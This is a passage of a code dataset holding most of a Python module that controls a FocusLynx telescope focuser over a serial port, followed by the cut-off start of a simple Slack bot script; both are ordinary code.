for\n\t\tport = the open port for communicating with the focuser\n\t\t\n\t\"\"\"\n\ttilt_stat = plc.plc_get_telescope_tilt_status()\n\tif tilt_stat['Tilt_angle'] == \"6h East <= x < RA East limit\" or \\\n\t\ttilt_stat['Tilt_angle'] == \"6h West <= x < RA West limit\":\n\t\n\t\tcommand = get_start_end_char('F'+str(check_focuser_no(x))+'CENTER')\n\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'M':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving to center')\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\n\telse:\n\t\tfocus_logger.error('Cannot center focuser, telescope is not parked')\n\t\tprint('Cannot center focuser, telescope is not parked')\n\ndef move_to_position(pos, port, x=1):\n\n\n\t\"\"\"\n\tAsk focuser 'x' to move to the position specifiedby 'pos'. Must be between \n\t 0 and the focuser's maximum position (112000). The controller will respond \n\t with 'M' when it starts moving.\n\t\n\tThis function will provide the necessary formating to the 'pos' parameter\n\t\n\t*** Should probably get something to check that it's stopped moving *****\n\t\n\tPARAMETERS:\n\t\n\tpos = integer in range 0 to focuser max position (112000), to which the \n\tfocuser will move.\n\tx = 1 or 2 depending on the which focuser the command is for\n\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\tx = str(check_focuser_no(x))\n\t\n\tif pos > 112000 or pos < 0:\n\t\tfocus_logger.error(str(pos)+ ' is an invalid position for focuser ' + x)\n\t\traise ValueError(str(pos)+ ' is an invalid position for focuser ' + x)\n\t\n\n\tformat_pos = '{0:>06}'.format(pos)\n\n\tcommand = get_start_end_char('F'+ x +'MA'+format_pos)\n\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'M':\n\t\tfocus_logger.info('Focuser '+str(x)+ ' moving to position: '+ format_pos)\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef move_focuser_in(port, x=1, move_speed=1):\n\t\"\"\"\n\tAsk focuser 'x' to move inwards (i.e. away from max position of 112000). \n\t Focuser will continue to move until a 'end_relative_move' command is \n\t received or it reaches the end of it's travel.\n\t\t\n\t*** Should probably get something to check that it's stopped moving *****\n\t\t\n\t\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmove_speed = 0 or 1, 0 for high speed, 1 for low speed\n\t\t\n\t\"\"\"\n\tvalid_speeds = [0,1]\n\tif move_speed not in valid_speeds:\n\t\tfocus_logger.error(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\t\traise ValueError(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\t\t\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'MIR'+str(move_speed))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'M':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving inwards')\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\ndef move_focuser_out(port, x=1, move_speed=1):\n\t\"\"\"\n\t\tAsk focuser 'x' to move outwards (i.e. towards the max position of \n\t\t 112000). Focuser will continue to move until a 'end_relative_move' \n\t\t command is received or it reaches the end of it's travel.\n\t\t\n\t\t*** Should probably get something to check that it's stopped moving ****\n\t\t\n\t\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmove_speed = 0 or 1, 0 for high speed, 1 for low speed\n\t\t\n\t\t\"\"\"\n\tvalid_speeds = [0,1]\n\tif move_speed not in valid_speeds:\n\t\tfocus_logger.error(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\t\traise ValueError(str(move_speed) + ' is not a valid move speed. 0 = '\\\n\t\t\t'High, 1 = low.')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'MOR'+str(move_speed))\n\t\tmessage = common.send_command_two_response(command, port)\n\t\t\n\t\tif message == 'M':\n\t\t\tfocus_logger.info('Focuser '+str(x)+ ' moving outwards')\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\ndef end_relative_move(port, x=1):\n\n\t\"\"\"\n\tWill get focuser 'x' to stop any relative motion. It should respond with \n\t 'STOPPED' when complete. If it was previously running, Temperature \n\t compensation will be resumed after the command is issued.\n\t \n\t PARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'ERM')\n\tmessage = common.send_command_two_response(command, port)\n\t\t\n\tif message == 'STOPPED':\n\t\tfocus_logger.info('Focuser '+str(x)+ ' motion stopped.')\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef get_focuser_status(port, x=1, return_dict=True):\n\t\"\"\"\n\tWill get focuser 'x' to display its current status. Should start with the \n\t line 'STATUSx' where x will be the focuser number, and finish with the \n\t line 'END'.\n\t\n\t\n\tINFO IN STATUS MESSAGE: (from manual)\n\t\n\tTemp(C): The current temperature in degrees Celisus\n\t\n\tCurr Pos: The current position of the specified focuser\n\t\n\tTarget Pos: The absolute position that the device is currently moving to \n\t\t(if the device is moving)\n\t\n\tIsMoving: This flag is set to 1 if the device is moving and 0 if the device \n\t\tis stationary\n\t\n\tIsHoming: This flag is set 1 while the device is homing and zero otherwise.\n\t\n\tIsHomed: For focusers that support homing, this flag will be set to 0 if the\n\t\tfocuser has not been homed and set to 1 when homed.\n\t\n\tFFDetect: Set to 1 when using an Optec FastFocus Focuser\n\t\n\tTmpProbe: This flag indicates the status of an attached temperature probe. \n\t\tA value of 1 means a probe is attached, 0 means no probe is detected.\n\t\n\tRemoteIO: This flag indicates the status of an attached In/Out remote. A \n\t\tvalue of 1 means a remote is attached, 0 means no remote is detected.\n\t\n\tHnd Ctrlr: This flag indicates the status of an attached hand controller. A \n\t\tvalue of 1 means a hand controller is attached, 0 means no hand \n\t\tcontroller is detected.\n\n\t \n\tPARAMETERS:\n\t\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\treturn_dict = True/False, set to true to get the config values returned \n\t\t\tas a dictionary\n\t\t\n\t\n\tRETURN\n\t\n\t\tmessage = The configuration message returned as a long string.\n\t\tmessage_dict = if return_dict is True, the message will be turned into a\n\t\t\tpython dictionary so parameters can be called to return values.\n\t\t\n\t\"\"\"\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'GETSTATUS')\n\tmessage = common.send_command_two_response(command, port,\n\t\texpected_end='END\\n')\n\n\tif return_dict == False:\n\t\treturn message\n\telse:\n\t\t#Convert string to python dictionary, as this will be easier to work\n\t\t# with in other parts of the code.\n\n\t\t#cut of the config + end bits, split into rows, and then split at equals\n\t\tmessage_dict = dict(row.split('=') for row in message[8:-4].split('\\n'))\n\t\t\n\t\t#Need to put the keys into a list, otherwise not all keys are looped\n\t\t# because the keys change during the loop. Was only doing half the\n\t\t# keys.\n\t\tdict_key_list = list(message_dict.keys())\n\t\t# as it is there lots of spaces at the start/end of name and values,\n\t\t# this will remove them\n\t\tfor name in dict_key_list:\n\t\t\tmessage_dict[name] = message_dict[name].strip()\n\t\t\tmessage_dict[name.strip()] = message_dict.pop(name)\n\n\t\treturn message_dict\n\ndef get_focuser_stored_config(port, x = 1, return_dict = False):\n\t\"\"\"\n\t\n\tWill get the controller to report the configuation setting for focuser 'x'. \n\t Should start with the line 'CONFIGx' where x will be the focuser number, \n\t and finish with the line 'END'.\n\t\n\tINFO IN CONFIG MESSAGE: (from manual)\n\t\n\tNickname: The user-defined nickname of the specified focuser\n\t\n\tMaxPos: The maximum absolute position that the selected focuser is capable \n\t of moving to. This setting is determined automatically based on the\n\t selected Device Type.\n\t\n\tDev Typ: A two character designator of the currently set device type for the\n\t specified focuser. See the section entitled ppendix A – Device Types on \n\t page 17 for device type details.\n\t\n\tTComp ON: The current status of temperature compensation. 1 indicates the \n\t device is currently temperature compensating, 0 indicates temperature \n\t compensation is disabled.\n\t\n\tTemCo A-E: These items indicate the temperature coefficient for the \n\t respective temperature compensation mode. The units of the temperature \n\t coefficients are stepper motor steps per degree.\n\t\n\tTC Mode: Indicates the currently selected temperature compensation mode. \n\t When temperature compensation mode is turned on this value selected mode \n\t indicates which temperature coefficient will be used for compensation.\n\t\n\tBLC En: This flag indicates whether the internal backlash compensation is \n\t turned on or off. A value of 1 indicates that this feature is turned on, \n\t 0 indicates the feature is off.\n\t\n\tBLC Stps: This value indicates the number of steps that the focuser will \n\t travel past the target position before returning to the target position \n\t in order to compensate for mechanical backlash in the focusing device. A \n\t positive value indicates the compensation will occur when the focuser move \n\t to a greater absolute position. A negative value indicates the compensation\n\twill occur on moves to a lesser position. LED Brt: This value indicates the \n\tcurrent setting for the brightness of the red power LED on the FocusLynx \n\tcontroller enclosure\n\t\n\tTC@Start: This value indicates if the Temperature Compensate at Start \n\t feature is turned on or off. A value of 1 indicate the feature is on, 0 \n\tindicates the feature is off. When this feature is enabled the device will \n\tautomatically perform a temperature compensation move immediately following \n\tdevice power-up.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\treturn_dict = True/False, set to true to get the config values returned \n\t\tas a dictionary\n\t\t\n\t\n\tRETURN\n\t\n\t\tmessage = The configuration message returned as a long string.\n\t\tmessage_dict = if return_dict is True, the message will be turned into \n\t\ta python dictionary so parameters can be called to return values.\n\t\t\n\t\n\t\"\"\"\n\t\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'GETCONFIG')\n\tmessage = common.send_command_two_response(command, port,\n\t\texpected_end='END\\n')\n\t\n\tif return_dict == False:\n\t\treturn message\n\telse:\n\t\t#Convert string to python dictionary, as this will be easier to work\n\t\t# with in other parts of the code.\n\t\t#cut of the config + end bits, split into rows, and then split at equals\n\t\tmessage_dict = dict(row.split('=') for row in message[8:-4].split('\\n'))\n\t\t\n\t\t#Need to put the keys into a list, otherwise not all keys are looped\n\t\t# because the keys change during the loop. Was only doing half the\n\t\t# keys.\n\t\tdict_key_list = list(message_dict.keys())\n\t\t# as it is there lots of spaces at the start/end of name and values,\n\t\t# this will remove them\n\t\tfor name in dict_key_list:\n\t\t\tmessage_dict[name] = message_dict[name].strip()\n\t\t\tmessage_dict[name.strip()] = message_dict.pop(name)\n\n\n\t\treturn message_dict\n\n\ndef set_device_name(port, device_name, x=1):\n\t\"\"\"\n\tUse to set a new nickname for focuser 'x'. Controller will respond with \n\t'SET' once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tdevice_name = string with new name. Max 16 char\n\t\n\t\"\"\"\n\t# check the length of the new device nickname\n\tname_length = len(device_name)\n\tif name_length > 16 or name_length <= 0:\n\t\tfocus_logger.error('Invalid device name given')\n\t\traise ValueError('Invalid device name given')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'SCNN'+str(device_name))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'SET':\n\t\t\tfocus_logger.info('Name for Focuser '+str(x)+ ' set as: ' + str(\n\t\t\t\tdevice_name))\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\n\ndef set_device_type(port, x = 1, device_type = 'OI'):\n\n\t\"\"\"\n\tUse this to specify the type of focuser attached. The controller uses this \n\tinformation to determine the correct speed and motor power to use. An \n\tincorrect value could damage a focuser. Valid settings are shown in \n\tAppendix A of the user manual, and are also listed here. The controller will\n\t respond with 'SET' once complete.\n\t\n\t\n\tAvailable Types:\n\t\n\t\tOA: Optec TCF-Lynx 2”\n\t\tOB: Optec TCF-Lynx 3”\n\t\tOC: Optec TCF-Lynx 2” with Extended Travel\n\t\tOD: Optec Fast Focus Secondary Focuser\n\t\tOE: Optec TCF-S Classic converted (original unipolar motor)\n\t\tOF: Optec TCF-S3 Classic converted (original unipolar motor)\n\t\tOG: Optec Gemini (reserved for future use)\n\t\tOI: what it was initial set as\n\t\tFA: FocusLynx QuickSync FT Hi-Torque\n\t\tFB: FocusLynx QuickSync FT Hi-Speed\n\t\n\t*** 2/11/18 ***\n\tI think the focuser are TCF-S 3\" so device type OB, but need to check.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\t\n\t\tport = the open port for communicating with the focuser\n\t\t\n\t\tdevice_type = string, 2 characters in length to set what type of focuser\n\t\t is connected to the control box. Valid options: OA, OB, OC, OD, OE, OF,\n\t\t OG, FA, and FB. See Appendix A of controller manual for more info.\n\n\t\n\t\"\"\"\n\n\tvalid_device_types = ['OA', 'OB', 'OC', 'OD', 'OE',\n\t\t\t\t\t\t\t'OF', 'OG', 'FA', 'FB', 'OI']\n\n\tif device_type not in valid_device_types:\n\n\t\tfocus_logger.error(str(device_type) + ' is not a valid device type.')\n\t\traise ValueError(str(device_type) + ' is not a valid device type.')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'SCDT'+str(device_type))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'SET':\n\t\t\tfocus_logger.info('Device Type for Focuser '+str(x)+ ' set '\\\n\t\t\t\t'as: ' + str(device_type))\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\n\n\ndef set_temp_comp(port, x =1, temp_comp = False):\n\t\"\"\"\n\tUse to enabled/disable the temperature compensation feature for focuser 'x'.\n\t Controller will respond with 'SET' once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\ttemp_comp = True/False. True will enabled the temperature compensation \n\t\t\tfeature, False will disable\n\n\n\t\"\"\"\n\tif temp_comp == True:\n\t\ttc_state = 'ENABLED'\n\t\tsetno = str(1)\n\t\n\telif temp_comp == False:\n\t\ttc_state = 'DISABLED'\n\t\tsetno = str(0)\n\telse:\n\t\t#print(temp_comp)\n\t\t#print(type(temp_comp))\n\t\tfocus_logger.error('Invalid input for temperature compensation control'\\\n\t\t\t'. True=Enable, False=Disable')\n\t\traise ValueError('Invalid input for temperature compensation control.'\\\n\t\t\t' True=Enable, False=Disable')\n\n\tx = str(check_focuser_no(x))\n\t#print(temp_comp)\n\tcommand = get_start_end_char('F'+ x +'SCTE'+str(setno))\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'SET':\n\t\tfocus_logger.info('Temperature compensation ' + tc_state + ' for'\\\n\t\t\t' focuser '+str(x))\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef set_temp_comp_mode(port, x=1, mode='A'):\n\n\t\"\"\"\n\tUse this to set the mode used when the temperature compensation mode is set.\n\t For example, selecting mode 'C' will mean that temperature coefficient \n\t 'C' will be used. The controller will respond with 'SET' once complete.\n\t\t\n\t\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmode = Mode to be selected for the temperature compensation. \n\t\tSuitable values are: A, B, C, D or E.\n\t\n\t\"\"\"\n\n\tvalid_modes = ['A','B','C','D','E']\n\tif mode not in valid_modes:\n\t\tfocus_logger.error(str(mode)+ ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\t\traise ValueError(str(mode) + ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\n\telse:\n\t\tx = str(check_focuser_no(x))\n\t\tcommand = get_start_end_char('F'+ x +'SCTM'+str(mode))\n\t\tmessage = common.send_command_two_response(command, port)\n\n\t\tif message == 'SET':\n\t\t\tfocus_logger.info('Temperature compensation mode ' + str(\n\t\t\t\tmode) + ' set for focuser '+str(x))\n\n\t\telse:\n\t\t\tfocus_logger.error('Response:'+message)\n\ndef set_temp_comp_coeff(port,mode,temp_coeff_val, x=1):\n\n\t\"\"\"\n\tUse this function to set the temperature coefficients for each of the \n\t\tmodes, for each focuser.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tmode = Mode to be selected for the temperature compensation. Suitable \n\t\t\tvalues are: A, B, C, D or E.\n\t\ttemp_coeff_val = integer (in steps per degree) to be used for the \n\t\t\tcoefficient. Between -9999 and 9999.\n\t\n\t\"\"\"\n\n\tvalid_modes = ['A','B','C','D','E']\n\tif mode not in valid_modes:\n\t\tfocus_logger.error(str(mode)+ ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\t\traise ValueError(str(mode) + ' is not a valid mode for the '\\\n\t\t\t'temperature compensation.')\n\n\n\tif isinstance(temp_coeff_val, int) == False:\n\t\tfocus_logger.error('Temperature compensation coefficient must be '\\\n\t\t\t'an integer')\n\telse:\n\n\t\tif temp_coeff_val < -9999 or temp_coeff_val > 9999:\n\t\t\tfocus_logger.error('Invalid value enter for the temperature '\\\n\t\t\t\t'compensation coefficient')\n\n\t\telse:\n\n\t\t\tx = str(check_focuser_no(x))\n\t\t\tformatted_coeff = '{0:=+05}'.format(temp_coeff_val)\n\t\t\tcommand = get_start_end_char('F'+ x +'SCTC'+str(\n\t\t\t\tmode)+formatted_coeff)\n\t\t\t\n\t\t\tmessage = common.send_command_two_response(command, port)\n\n\t\t\tif message == 'SET':\n\t\t\t\tfocus_logger.info('Temperature compensation coefficient'\\\n\t\t\t\t\t'set as ' + formatted_coeff +\n\t\t\t\t' for mode: '+ str(mode) + ' and for focuser '+str(x))\n\n\t\t\telse:\n\t\t\t\tfocus_logger.error('Response:'+message)\n\n\ndef set_temp_comp_start_state(port, x=1, temp_comp_start = False):\n\n\t\"\"\"\n\tEnable or disable the 'Temperature Compensation at Start' feature on the \n\t controller. When enabled, the controller will perform a temperature \n\t compensation move when the device is first switched on, using the \n\t temperature recorded last time the compensation feature was switched on. \n\t Controller will respond with 'SET' once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\ttemp_comp_start = True/False. True will enabled the 'temperature \n\t\t\tcompensation at start' feature, False will disable it.\n\t\n\t\"\"\"\n\tif temp_comp_start == False:\n\t\ttcs_state = 'DISABLED'\n\t\tset_no = 0\n\telif temp_comp_start == True:\n\t\ttcs_state = 'ENABLED'\n\t\tset_no =1\n\telse:\n\t\tfocus_logger.error('Invalid input for \"temperature compensation at '\\\n\t\t\t'start\" control. True=Enable, False=Disable')\n\t\traise ValueError('Invalid input for \"temperature compensation at '\\\n\t\t\t'start\" control. True=Enable, False=Disable')\n\n\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'SCTS'+str(set_no))\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'SET':\n\t\tfocus_logger.info('\"Temperature compensation at start\" state set '\\\n\t\t\t'to ' + tcs_state + ' for focuser '+str(x))\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\n\ndef set_backlash_comp(port,x=1, backlash_comp = False):\n\n\t\"\"\"\n\tEnable or disable the 'Backlash Compensation as Start' feature on the \n\t controller. When enabled, the controller will move the focus pass the \n\t target position (by a number of steps that is set using the \n\t set_backlash_steps() function) and then return to the target position. \n\t This is so the focuser always approaches the target postition to try to \n\t avoid mechanical backlash. Backlash compensation is caried out on all \n\t outward moves (never on inward moves) Controller will respond with 'SET' \n\t once complete.\n\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tbacklash_comp = True/False. True will enabled the backlash compensation\n\t\t feature, False will disable it.\n\t\n\t\"\"\"\n\tif backlash_comp == False:\n\t\tbl_state = 'DISABLED'\n\t\tset_no = 0\n\telif backlash_comp == True:\n\t\tbl_state = 'ENABLED'\n\t\tset_no =1\n\telse:\n\t\tfocus_logger.error('Invalid input for backlash compensation control.'\\\n\t\t\t' True=Enable, False=Disable')\n\t\traise ValueError('Invalid input for backlash compensation control. '\\\n\t\t\t'True=Enable, False=Disable')\n\n\n\tx = str(check_focuser_no(x))\n\tcommand = get_start_end_char('F'+ x +'SCBE'+str(set_no))\n\tmessage = common.send_command_two_response(command, port)\n\n\tif message == 'SET':\n\t\tfocus_logger.info('Backlash compensation state set to ' + bl_state +\n\t\t\t' for focuser '+str(x))\n\n\telse:\n\t\tfocus_logger.error('Response:'+message)\n\ndef set_backlash_steps(port,x=1, backlash_steps = 10):\n\n\t\"\"\"\n\tUse to set the number of steps the focuser will move past the target \n\t position whilst carrying out a backlash compensation move. Backlash \n\t compensation is caried out on all outward moves (never on inward moves) \n\t Controller will respond with 'SET' once complete.\n\t\t\n\tPARAMETERS:\n\t\n\t\tx = 1 or 2 depending on the which focuser the command is for\n\t\tport = the open port for communicating with the focuser\n\t\tbacklash_steps = Integer between 0-99, for the number of steps past the \n\t\t\ttarget point the focuser will move.\n\t\n\t\"\"\"\n\t#make sure value is an integer\n\tif isinstance(backlash_steps, int) == False:\n\t\tfocus_logger.error('Backlash steps value must be an integer.')\n\t\t\n\telse:\n\t\tif backlash_steps<=0 or backlash_steps >99:\n\t\t\tfocus_logger.error('Backlash steps must be between 0 and 99')\n\n\t\telse:\n\t\t\tx = str(check_focuser_no(x))\n\t\t\tformatted_steps = '{0:>02}'.format(backlash_steps)\n\t\t\tcommand = get_start_end_char('F'+ x +'SCBS'+str(formatted_steps))\n\t\t\tmessage = common.send_command_two_response(command, port)\n\n\t\t\tif message == 'SET':\n\t\t\t\tfocus_logger.info('Backlash steps set to ' + formatted_steps +\n\t\t\t\t\t' for focuser '+str(x))\n\n\t\t\telse:\n\t\t\t\tfocus_logger.error('Response:'+message)\n\ndef set_LED_brightness(brightness, port):\n\n\t\"\"\"\n\tUse 'brightness' to change the brightness of the LED on the controller \n\t enclosure. 0 will turn off the LED. Controller will respond with 'SET' \n\t once complete.\n\t\n\tPARAMETERS:\n\t\n\tbrightness = An integer between 0 and 100. 0 will turn off the LED.\n\tport = the open port for communicating with the focuser\n\t\n\t\"\"\"\n\t\n\n\tif isinstance(brightness, int):\n\t\n\t\tif brightness > 100 or brightness < 0:\n\t\t\tfocus_logger.error(str(brightness)+ ' is an invalid value for '\\\n\t\t\t\t'brightness setting.')\n\t\telse:\n\t\t\tformat_bright = '{0:>03}'.format(brightness)\n\n\t\t\tcommand = get_start_end_char('FHSCLB'+format_bright)\n\n\t\t\tmessage = common.send_command_two_response(command, port)\n\n\t\t\tif message == 'SET':\n\t\t\t\tfocus_logger.info('LED brightness set to: ' + str(\n\t\t\t\t\tformat_bright))\n\t\t\telse:\n\t\t\t\tfocus_logger.error('Response:'+message)\n\n\telse:\n\t\n\t\tfocus_logger.error('Check value entered for brightness setting.')\n\n\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nGroup OBSERVING FUNCTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\n\ndef focuser_initial_configuration(config_file_name,\n\t\t\tconfig_file_loc = 'configs/'):\n\t\"\"\"\n\t\n\tThis function will set all the settings needed to run a focuser. The \n\t settings will be loaded from a configuration file, and passed to the\n\t relavent control functions.\n\t \n\t Don't think this will need to be done everytime the focuser is run, just \n\t when first setup unless you'd like to change the settings.\n\t \n\t General description of function:\n\t - Load configuration file and check serial port connection settings.\n\t - Open a serial port connection to the focuser\n\t - Set the device name and type in the onboard focuser configuration.\n\t - Set the LED brightness.\n\t - Set everything required for the temperature compensation, even if it is\n\t\t\tnot used\n\t - Set everything for the backlash compensation, even if it is not used.\n\t - Close the port.\n\t \n\t PARAMETERS:\n\t \n\t config_file_name = name of the file containing configuration setting for \n\t\tthe focuser\n\t config_file_loc = directory to find the configuration file\n\t \n\t\"\"\"\n\n\tconfig_dict = common.load_config(config_file_name, path = config_file_loc)\n\tcheck_config_port_values_for_focuser(config_dict)\n\topen_p = common.open_port_from_config_param(config_dict)\n\n\tfocuser_no = config_dict['focuser_no']\n\t#start loading the settings\n\tset_device_name(open_p, device_name = config_dict['focuser_name'],\n\t\tx=focuser_no)\n\tset_device_type(open_p, device_type= config_dict['device_type'],\n\t\tx=focuser_no)\n\tset_LED_brightness(config_dict['LED_brightness'], open_p)\n\n\t#set temperature compensation setings:\n\tset_temp_comp(open_p, temp_comp = config_dict['temp_compen'], x=focuser_no)\n\tset_temp_comp_start_state(open_p,\n\t\ttemp_comp_start = config_dict['temp_compen_at_start'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode= 'A',\n\t\ttemp_coeff_val=config_dict['temp_coeffA'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='B',\n\t\ttemp_coeff_val=config_dict['temp_coeffB'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='C',\n\t\ttemp_coeff_val= config_dict['temp_coeffC'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='D',\n\t\ttemp_coeff_val=config_dict['temp_coeffD'], x= focuser_no)\n\tset_temp_comp_coeff(open_p, mode='E',\n\t\ttemp_coeff_val=config_dict['temp_coeffE'], x= focuser_no)\n\tset_temp_comp_mode(open_p, mode = config_dict['temp_compen_mode'],\n\t\tx= focuser_no)\n\n\t#Set backlash settings:\n\tset_backlash_comp(open_p, backlash_comp = config_dict['backlash_compen'],\n\t\tx= focuser_no)\n\tcheck_config_port_values_for_focuser(config_dict)\n\tset_backlash_steps(open_p, backlash_steps = config_dict['backlash_steps'],\n\t\tx= focuser_no )\n\t\n\tget_focuser_stored_config(open_p, x= focuser_no)\n\n\t#close the port\n\tcommon.close_port(open_p)\n\ndef startup_focuser(config_file_name, config_file_loc = 'configs/'):\n\t\"\"\"\n\t\n\tThis function will perform any startup operations, to make it so the\n\t focuser is ready to work. Return the open port ready for sending further \n\t instructions.\n\t \n\tPARAMETERS:\n\t \n\t config_file_name = name of the file containing configuration setting for \n\t\tthe focuser\n\t config_file_loc = directory to find the configuration file\n\t \n\tRETURN\n\t\n\t\tfocuser_no = Number of the focuser that has been started up\n\t\topen_p = the serial port that has been opened for future communication.\n\t \n\t\"\"\"\n\tconfig_dict = common.load_config(config_file_name, path = config_file_loc)\n\tcheck_config_port_values_for_focuser(config_dict)\n\topen_p = common.open_port_from_config_param(config_dict)\n\tfocuser_no = config_dict['focuser_no']\n\n\t#home_focuser(open_p, x = focuser_no)\n\t\n\t\n\tcurrent_config=get_focuser_stored_config(open_p, x = focuser_no,\n\t\treturn_dict=True)\n\tif current_config['TComp ON'] == 1:\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Temperature '\\\n\t\t\t'compensation - ON')\n\telse:\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Temperature '\\\n\t\t\t'compensation - OFF')\n\tif current_config['BLC En'] == 1:\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Backlash compensation'\\\n\t\t\t' - ON')\n\telse:\n\t\tfocus_logger.info('Focuser '+str(focuser_no)+': Backlash compensation '\\\n\t\t\t'- OFF')\n\n\tfocus_logger.info('Startup for Focuser '+str(focuser_no)+' complete.')\n\n\treturn focuser_no, open_p\n\ndef shutdown_focuser(open_p, x=1):\n\t\"\"\"\n\t\n\tThis function will perform any shutdown operations at the end of the night \n\t\tor during shutdown. Then close the serial port connection\n\n\tPARAMETERS:\n\t\t\n\t\topen_p = an open serial port connection to the focuser\n\t\tx = focuser number\n\t\n\t\"\"\"\n\n\t#center_focuser(open_p)\n\topen_p.close()\n\n\tfocus_logger.info('Serial port connection to focuser has been closed')\n\n\"\"\"\n\t#Might be used for testing the status setup\n\tSTATUS1\\nTemp(C) = +21.7\\nCurr Pos = 108085\\nTarg Pos = 000000\\nIsMoving \n\t\t= 1\\nIsHoming = 1\\nIsHomed = 0\\nFFDetect = 0\\nTmpProbe = 1\\nRemoteIO \n\t\t= 0\\nHnd Ctlr = 0\\nEND\n\t\n\tCONFIG\\nNickname = FocusLynx Foc2\\nMax Pos = 125440\\nDevTyp =OE\\nTComp ON \n\t\t= 0\\nTempCo A = +0086\\nTempCo B = +0086\\nTempCo C = +0086\\nTempCo D = \n\t\t+0000\\nTempCo E = +0000\\nTCMode =A\\nBLC En =0\\nBLC Stps = +40\\nLED Brt \n\t\t= 075\\nTC@Start = 0\\nEND\n\"\"\"\n","sub_path":"focuser_control.py","file_name":"focuser_control.py","file_ext":"py","file_size_in_byte":36260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"579594423","text":"import os\nimport time\nfrom slackclient import SlackClient\n\n# ticketbro's bot ID\nBOT_ID = os.environ.get(\"BOT_ID\")\n\n# constants\nAT_BOT = \"<@\" + BOT_ID + \">:\"\nEXAMPLE_COMMAND = \"do\"\nFAM = \"fam?\"\n\n# instantiate slack client\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\n\ndef handle_command(command, channel):\n\t\"\"\"\n\t\tReceives commands directed at the bot and checks if they're valid.\n\t\tIf not, it comes back and asks for more info.\n\t\"\"\"\n\tresponse = \"That looks wrong. Use the *\" + EXAMPLE_COMMAND + \\\n\t\t\t\t\"* command with numbers, delimited by spaces.\"\n\tif command.startswith(EXAMPLE_COMMAND):\n\t\tresponse = \"I got this.\"\n\n\tif 